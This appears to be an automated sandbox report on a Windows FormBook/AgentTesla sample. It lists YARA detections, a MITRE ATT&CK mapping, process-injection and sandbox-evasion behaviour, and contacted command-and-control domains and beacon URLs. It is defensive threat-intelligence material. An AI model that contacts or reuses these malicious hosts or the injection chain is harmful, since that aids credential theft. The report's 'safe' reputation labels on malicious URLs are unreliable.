          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385308 Sample: s6G3ZtvHZg.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 33 www.ux300e.com 2->33 35 www.rosewoodcibubur.com 2->35 37 3 other IPs or domains 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 6 other signatures 2->51 11 s6G3ZtvHZg.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\s6G3ZtvHZg.exe.log, ASCII 11->31 dropped 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 s6G3ZtvHZg.exe 11->15         started        18 s6G3ZtvHZg.exe 11->18         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 20 explorer.exe 15->20 injected process9 dnsIp10 39 www.moretuantired.com 81.17.18.198, 49718, 80 PLI-ASCH Switzerland 20->39 41 www.theartsutra.com 142.111.76.118, 49735, 80 EGIHOSTINGUS United States 20->41 43 13 other IPs or domains 20->43 53 System process connects to network (likely due to code injection or exploit) 20->53 55 Performs DNS queries to domains with low reputation 20->55 24 help.exe 20->24         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          s6G3ZtvHZg.exe28%VirustotalBrowse
          s6G3ZtvHZg.exe25%ReversingLabsWin32.Trojan.AgentTesla
          s6G3ZtvHZg.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.s6G3ZtvHZg.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          hotlightexpens.fun0%VirustotalBrowse
          www.betbonusuk.com0%VirustotalBrowse
          loktantratvnews.com0%VirustotalBrowse
          www.getboostphlo.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          www.okitmall.com/iu4d/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.betbonusuk.com/iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ==0%Avira URL Cloudsafe
          http://www.warungjitu.com/iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg==0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.theartsutra.com/iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.okitmall.com/iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA==0%Avira URL Cloudsafe
          http://www.moretuantired.com/iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.appearwood.club/iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw==0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.weluvweb.com/iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==0%Avira URL Cloudsafe
          http://www.chestfreezersale.xyz/iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          3.13.255.157
          truefalse
            high
            hotlightexpens.fun
            52.206.71.220
            truetrueunknown
            www.betbonusuk.com
            104.21.7.67
            truetrueunknown
            loktantratvnews.com
            148.66.136.150
            truetrueunknown
            www.getboostphlo.com
            172.67.219.254
            truefalseunknown
            www.moretuantired.com
            81.17.18.198
            truetrue
              unknown
              www.weluvweb.com
              52.56.126.26
              truetrue
                unknown
                www.ux300e.com
                52.58.78.16
                truetrue
                  unknown
                  emmajanetracy.com
                  192.0.78.25
                  truetrue
                    unknown
                    www.okitmall.com
                    15.165.26.252
                    truetrue
                      unknown
                      www.theartsutra.com
                      142.111.76.118
                      truetrue
                        unknown
                        www.chestfreezersale.xyz
                        172.67.130.43
                        truetrue
                          unknown
                          www.loktantratvnews.com
                          unknown
                          unknowntrue
                            unknown
                            www.appearwood.club
                            unknown
                            unknowntrue
                              unknown
                              www.warungjitu.com
                              unknown
                              unknowntrue
                                unknown
                                www.rosewoodcibubur.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.omxpro.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.peridot.website
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.emmajanetracy.com
                                      unknown
                                      unknowntrue
                                        unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        www.okitmall.com/iu4d/true
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.betbonusuk.com/iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.warungjitu.com/iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.theartsutra.com/iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.okitmall.com/iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.moretuantired.com/iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.appearwood.club/iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.weluvweb.com/iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.chestfreezersale.xyz/iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg==true
                                        • Avira URL Cloud: safe
                                        unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.272051627.0000000006840000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.apache.org/licenses/LICENSE-2.0s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designersGs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designers/?s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/bThes6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers?s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.tiro.comexplorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.goodfont.co.krs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.csss6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.carterandcone.comls6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sajatypeworks.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.typography.netDs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          high
